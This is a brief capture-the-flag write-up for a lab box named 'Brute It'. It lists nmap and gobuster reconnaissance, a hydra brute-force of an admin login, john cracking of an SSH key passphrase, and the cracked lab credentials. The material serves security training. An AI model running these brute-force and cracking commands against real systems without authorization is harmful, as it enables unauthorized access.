Brute It

April 26, 2024

Task 1: About this box

Task 2: Reconnaissance

# Nmap 7.94 scan initiated Fri Apr 26 18:57:24 2024 as: nmap -sS -sV -oN nmap -vv -Pn 10.10.190.164
Increasing send delay for 10.10.190.164 from 0 to 5 due to 51 out of 168 dropped probes since last increase.
Nmap scan report for 10.10.190.164
Host is up, received user-set (0.33s latency).
Scanned at 2024-04-26 18:57:24 PST for 33s
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Apr 26 18:57:57 2024 -- 1 IP address (1 host up) scanned in 33.23 seconds

gobuster dir -u http://10.10.197.206/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster

Task 3: Getting a shell

hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.197.206 http-post-form "/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid"

admin:xavier

ssh2john id-rsa > forjohn.txt
cat forjohn.txt
sudo john --wordlist=/usr/share/wordlists/rockyou.txt forjohn.txt

passphrase - rockinroll

chmod 600
ssh -i id-rsa john@10.10.197.206

Task 4: Privilege Escalation

root:football

PreviousEasy Peasy NextIgnite

Last updated 1 year ago